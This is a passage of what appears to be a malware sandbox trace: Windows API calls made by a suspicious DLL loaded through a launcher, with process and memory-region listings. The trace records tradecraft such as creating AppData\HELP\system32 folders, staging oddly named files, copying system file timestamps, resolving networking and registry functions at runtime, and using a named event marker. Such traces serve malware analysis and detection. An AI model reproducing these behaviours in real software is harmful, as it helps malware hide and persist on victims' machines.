(dwErrCode=0x0) [0034.628] GetLastError () returned 0x0 [0034.629] SetLastError (dwErrCode=0x0) [0034.629] GetLastError () returned 0x0 [0034.629] SetLastError (dwErrCode=0x0) [0034.629] GetLastError () returned 0x0 [0034.629] SetLastError (dwErrCode=0x0) [0034.629] GetLastError () returned 0x0 [0034.629] SetLastError (dwErrCode=0x0) [0034.629] GetLastError () returned 0x0 [0034.629] SetLastError (dwErrCode=0x0) [0034.629] GetLastError () returned 0x0 [0034.629] SetLastError (dwErrCode=0x0) [0034.629] GetLastError () returned 0x0 [0034.629] SetLastError (dwErrCode=0x0) [0034.630] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0034.630] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0034.630] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0034.631] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efb30 | out: lpSystemTimeAsFileTime=0x2efb30*(dwLowDateTime=0xe2529390, dwHighDateTime=0x1d3dfba)) [0034.631] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2efa68, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.631] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ef950, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.631] GetLastError () returned 0x0 [0034.631] GetLastError () returned 0x0 [0034.631] GetLastError () returned 0x0 [0034.631] GetLastError () returned 0x0 [0034.631] GetLastError () returned 0x0 [0034.632] GetLastError () returned 0x0 [0034.632] GetLastError () returned 0x0 [0034.632] GetLastError () returned 0x0 [0034.632] GetLastError () returned 0x0 [0034.632] GetLastError () returned 0x0 [0034.632] GetLastError () returned 0x0 [0034.632] GetLastError () returned 0x0 [0034.632] GetLastError () returned 0x0 [0034.632] GetLastError () returned 0x0 [0034.632] GetLastError () returned 0x0 [0034.632] GetLastError () returned 0x0 [0034.632] GetLastError () returned 0x0 [0034.632] GetLastError () returned 0x0 [0034.632] GetLastError () returned 0x0 [0034.632] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.632] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0034.632] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.632] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.632] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.632] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.632] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0034.632] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0034.632] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0034.632] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0034.633] GetLastError () returned 0xb7 [0034.633] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.633] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0034.633] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0034.633] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0034.633] wsprintfA (in: param_1=0x2ef7d0, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.633] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0034.633] wsprintfA (in: param_1=0x2ef6cc, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.633] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.633] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0034.633] CloseHandle (hObject=0x74) returned 1 [0034.633] GetLastError () returned 0x0 [0034.633] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0034.633] GetLastError () returned 0x0 [0034.633] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0034.634] GetSystemDirectoryA (in: lpBuffer=0x2ef7d0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.634] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.634] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0034.634] CloseHandle (hObject=0x74) returned 1 [0034.634] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.634] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.634] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0034.636] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.636] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0034.636] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0034.636] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0034.637] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0034.637] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0034.637] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0034.637] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0034.637] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0034.637] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0034.637] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0034.637] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0034.637] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0034.637] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0034.637] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0034.637] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0034.637] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0034.637] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0034.637] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0034.637] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0034.638] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0034.638] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0034.638] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0034.638] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0034.638] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0034.638] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0034.638] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0034.638] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0034.638] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0034.638] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0034.638] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0034.638] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0034.638] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0034.638] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0034.638] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0034.638] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0034.638] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0034.639] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.639] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0034.639] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0034.639] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0034.639] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0034.639] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0034.639] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0034.639] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0034.639] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0034.639] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0034.639] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0034.639] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0034.639] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0034.639] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0034.639] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0034.639] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0034.639] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0034.640] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0034.640] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0034.640] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0034.640] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0034.640] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0034.640] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0034.640] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0034.640] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.640] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.640] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.640] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0034.642] HeapDestroy (hHeap=0x1d0000) returned 1 Process: id = "48" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb60" os_pid = "0xcbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry /fn_args=\"127.0.0.1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2134 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2135 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2136 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2137 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2138 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2139 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2140 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2141 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2142 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 2143 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2144 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2145 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2146 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2147 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 2148 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2149 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2150 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2151 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2152 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2153 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2154 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2155 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2156 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2157 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2158 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2159 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2160 start_va = 0x1e0000 end_va = 0x2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2161 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2162 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2163 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2164 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2165 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2166 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 2167 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2168 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2169 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2170 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2171 start_va = 0x1200000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2172 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2173 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2174 start_va = 0x12d0000 end_va = 0x144ffff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 2966 start_va = 0x12d0000 end_va = 0x13cffff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 2967 start_va = 0x1410000 end_va = 0x144ffff entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 2968 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Thread: id = 102 os_tid = 0xcc0 [0034.698] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fa3c | out: lpSystemTimeAsFileTime=0x16fa3c*(dwLowDateTime=0xe25e7a70, dwHighDateTime=0x1d3dfba)) [0034.698] GetCurrentProcessId () returned 0xcbc [0034.699] GetCurrentThreadId () returned 0xcc0 [0034.699] GetTickCount () returned 0x17cdc [0034.699] QueryPerformanceCounter (in: lpPerformanceCount=0x16fa34 | out: lpPerformanceCount=0x16fa34*=371762962) returned 1 [0034.699] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.699] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0034.699] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0034.699] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0034.699] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0034.700] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.700] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.700] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.700] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.700] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.700] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.700] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.700] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.700] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.700] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.700] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.700] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.700] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.700] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.701] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.701] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.701] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.701] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.701] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.701] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.701] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.701] GetCurrentThreadId () returned 0xcc0 [0034.701] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry /fn_args=\"127.0.0.1\"" [0034.701] GetEnvironmentStringsW () returned 0x367850* [0034.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0034.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x12c09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0034.702] FreeEnvironmentStringsW (penv=0x367850) returned 1 [0034.702] GetStartupInfoA (in: lpStartupInfo=0x16f98c | out: lpStartupInfo=0x16f98c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0034.702] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0034.702] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0034.702] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0034.702] SetHandleCount (uNumber=0x20) returned 0x20 [0034.702] GetLastError () returned 0x0 [0034.702] SetLastError (dwErrCode=0x0) [0034.702] GetLastError () returned 0x0 [0034.702] SetLastError (dwErrCode=0x0) [0034.702] GetLastError () returned 0x0 [0034.702] SetLastError (dwErrCode=0x0) [0034.702] GetACP () returned 0x4e4 [0034.702] GetLastError () returned 0x0 [0034.702] SetLastError (dwErrCode=0x0) [0034.702] IsValidCodePage (CodePage=0x4e4) returned 1 [0034.702] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x16f96c | out: lpCPInfo=0x16f96c) returned 1 [0034.702] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x16f438 | out: lpCPInfo=0x16f438) returned 1 [0034.702] GetLastError () returned 0x0 [0034.702] SetLastError (dwErrCode=0x0) [0034.702] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x16f3c8 | out: lpCharType=0x16f3c8) returned 1 [0034.702] 